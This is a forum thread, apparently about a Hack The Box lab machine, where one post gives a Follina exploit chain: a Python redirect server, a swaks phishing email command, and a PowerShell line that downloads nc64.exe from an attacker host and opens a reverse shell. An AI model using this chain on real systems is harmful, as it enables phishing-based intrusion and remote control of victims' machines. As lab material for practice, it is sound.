Return to forum

crypt1 · August 17, 2022 at 6:45 PM

thanks

nekr0fear · August 18, 2022 at 4:25 AM

.....

fack · August 18, 2022 at 5:53 AM

svxzvcxzvbdsvdcx

Sly · August 18, 2022 at 7:08 AM

Thank you for this.

Atelier · August 18, 2022 at 7:16 AM

For follina part, the matter is make target to call HTML payload. From my test, the doc file is not important in this case.
what I did is, make a 301 redirect to html payload.

you may try different way

import http.server
import socketserver

class myHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(self.path) 
        if self.path == '/test':
            self.send_response(301)
            self.send_header('Location','http://10.10.XX.XX:9999/index.html') #if your html payload on rt 9999
            self.end_headers()
        return http.server.SimpleHTTPRequestHandler.do_GET(self)

theport = 80
Handler = myHandler
pywebserver = socketserver.TCPServer(("", theport), Handler)

print("Python based web server. Serving at port", theport)
pywebserver.serve_forever()

send link via email

swaks --to [email protected] --from test@test--server mail.outdated.htb --body "http://10.10.XX.XX/test"

make sure you change nc64.exe location to your kali machine

command = f"""Invoke-WebRequest http://10.10.XX.XX/nc64.exe -OutFile C:\\Windows\\Tasks\
c.exe; C:\\Windows\\Tasks\
c.exe -e cmd.exe {serve_host} {netcat_PORT_NO}"""

rnerd · August 18, 2022 at 7:41 AM

THq ASAD

Justmine · August 18, 2022 at 8:13 AM

Naisu

imousrf · August 18, 2022 at 10:49 AM

I guess i'm still a newbie to get all of this

bt380 · August 18, 2022 at 4:55 PM

thx a lot

htbhtbhtb · August 18, 2022 at 4:57 PM

Box seems unstable. Getting callbacks for the initial foothold is very hit and miss.